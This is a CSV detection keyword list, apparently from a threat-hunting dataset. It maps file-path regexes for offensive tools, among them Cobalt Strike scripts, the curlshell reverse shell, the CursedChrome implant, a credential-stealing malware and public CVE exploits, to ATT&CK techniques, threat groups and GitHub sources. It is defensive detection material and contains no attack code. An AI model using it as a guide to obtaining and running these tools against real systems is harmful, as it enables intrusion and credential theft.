"*/curl.x86.o",".{0,1000}\/curl\.x86\.o","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","6335"
"*/curlshell.git*",".{0,1000}\/curlshell\.git.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1105 - T1059.004 - T1140","TA0011 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","6336"
"*/curlshell.git*",".{0,1000}\/curlshell\.git.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","6337"
"*/curlshell.py*",".{0,1000}\/curlshell\.py.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","6338"
"*/curlshell-main.*",".{0,1000}\/curlshell\-main\..{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","1","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","6339"
"*/curlshell-main/*",".{0,1000}\/curlshell\-main\/.{0,1000}","offensive_tool_keyword","curlshell","reverse shell using curl","T1572","TA0002 - TA0011","N/A","N/A","C2","https://github.com/irsl/curlshell","1","0","N/A","N/A","10","10","454","73","2024-04-20T15:23:11Z","2023-07-13T19:38:34Z","6340"
"*/CursedChrome.git*",".{0,1000}\/CursedChrome\.git.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","1","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","6341"
"*/cursorinit.vbs*",".{0,1000}\/cursorinit\.vbs.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","N/A","10","","N/A","","","","6342"
"*/custom_crack_list.txt*",".{0,1000}\/custom_crack_list\.txt.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6343"
"*/custom_payload_generator/*",".{0,1000}\/custom_payload_generator\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Aggressor Scripts I've Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","N/A","10","10","149","30","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z","6344"
"*/customPayload/*",".{0,1000}\/customPayload\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6345"
"*/CVE-*-*_POC.py*",".{0,1000}\/CVE\-.{0,1000}\-.{0,1000}_POC\.py.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","6346"
"*/CVE-*.bin",".{0,1000}\/CVE\-.{0,1000}\.bin","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6347"
"*/CVE-*.jar",".{0,1000}\/CVE\-.{0,1000}\.jar","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6348"
"*/CVE*/chocobo_root*",".{0,1000}\/CVE.{0,1000}\/chocobo_root.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","6349"
"*/CVE-*_EXPLOIT_0DAY/*",".{0,1000}\/CVE\-.{0,1000}_EXPLOIT_0DAY\/.{0,1000}","offensive_tool_keyword","poc","Exploit for the CVE-2023-23399","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","N/A","2","161","41","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z","6350"
"*/CVE-*x64.exe",".{0,1000}\/CVE\-.{0,1000}x64\.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6351"
"*/CVE-*x86.exe",".{0,1000}\/CVE\-.{0,1000}x86\.exe","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6352"
"*/CVE-2009-2698/katon.c*",".{0,1000}\/CVE\-2009\-2698\/katon\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","6353"
"*/cve-2014-4113.x64.dll*",".{0,1000}\/cve\-2014\-4113\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6354"
"*/cve-2014-4113.x86.dll*",".{0,1000}\/cve\-2014\-4113\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6355"
"*/cve-2015-1701.x64.dll*",".{0,1000}\/cve\-2015\-1701\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6356"
"*/cve-2015-1701.x86.dll*",".{0,1000}\/cve\-2015\-1701\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6357"
"*/cve-2016-0051.x86.dll*",".{0,1000}\/cve\-2016\-0051\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6358"
"*/CVE-2020-0796.x64.dll*",".{0,1000}\/CVE\-2020\-0796\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6359"
"*/CVE-2021-1675.git*",".{0,1000}\/CVE\-2021\-1675\.git.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","6360"
"*/CVE-2021-1675.x64.dll*",".{0,1000}\/CVE\-2021\-1675\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6361"
"*/CVE-2021-21972.git*",".{0,1000}\/CVE\-2021\-21972\.git.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","1","N/A","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","6362"
"*/CVE-2021-21985_PoC.git*",".{0,1000}\/CVE\-2021\-21985_PoC\.git.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","1","N/A","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","6363"
"*/CVE-2022-*.git*",".{0,1000}\/CVE\-2022\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tool","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6364"
"*/CVE-2022-*.go*",".{0,1000}\/CVE\-2022\-.{0,1000}\.go.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","6365"
"*/CVE-2022-0847.c*",".{0,1000}\/CVE\-2022\-0847\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","N/A","1","4","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z","6366"
"*/CVE-2022-0847/write_anything.c*",".{0,1000}\/CVE\-2022\-0847\/write_anything\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tool","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z","6367"
"*/CVE-2022-0847-dirty-pipe-checker*",".{0,1000}\/CVE\-2022\-0847\-dirty\-pipe\-checker.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","N/A","1","67","29","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z","6368"
"*/CVE-2022-0847-DirtyPipe-Exploit*",".{0,1000}\/CVE\-2022\-0847\-DirtyPipe\-Exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit","1","1","N/A","N/A","N/A","10","1099","221","2022-03-08T06:20:05Z","2022-03-07T18:55:20Z","6369"
"*/CVE-2022-0847-dirty-pipe-exploit*",".{0,1000}\/CVE\-2022\-0847\-dirty\-pipe\-exploit.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit","1","1","N/A","N/A","N/A","1","1","3","2022-03-08T11:15:00Z","2022-03-08T10:40:07Z","6370"
"*/CVE-2022-0847-Docker*",".{0,1000}\/CVE\-2022\-0847\-Docker.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/mrchucu1/CVE-2022-0847-Docker","1","1","N/A","N/A","N/A","1","0","1","2022-03-08T17:05:01Z","2022-03-08T17:02:40Z","6371"
"*/cve-2022-23131-exp/blob/main/zabbix.py*",".{0,1000}\/cve\-2022\-23131\-exp\/blob\/main\/zabbix\.py.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/random-robbie/cve-2022-23131-exp","1","1","N/A","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z","6372"
"*/CVE-2022-26809-RCE*",".{0,1000}\/CVE\-2022\-26809\-RCE.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","N/A","1","26","3","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z","6373"
"*/CVE-2023-*.git*",".{0,1000}\/CVE\-2023\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","POC","POC exploit pattern from github","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tool","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6374"
"*/CVE-2023-34362.git*",".{0,1000}\/CVE\-2023\-34362\.git.{0,1000}","offensive_tool_keyword","POC","CVE-2023-34362: MOVEit Transfer Unauthenticated RCE","T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003","TA0005 - TA0001 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-34362","1","1","N/A","N/A","N/A","1","64","23","2024-03-24T00:46:38Z","2023-06-12T12:56:12Z","6375"
"*/CVE-2023-38831-RaRCE*",".{0,1000}\/CVE\-2023\-38831\-RaRCE.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","6376"
"*/CVE-2024-1086.git*",".{0,1000}\/CVE\-2024\-1086\.git.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","1","#linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","6377"
"*/CVE-2024-21338.git*",".{0,1000}\/CVE\-2024\-21338\.git.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","1","N/A","N/A","9","3","292","60","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z","6378"
"*/CVE-2024-22274-RCE.git*",".{0,1000}\/CVE\-2024\-22274\-RCE\.git.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","1","N/A","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","6379"
"*/CVE-2024-49138-POC.git*",".{0,1000}\/CVE\-2024\-49138\-POC\.git.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","1","N/A","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","6380"
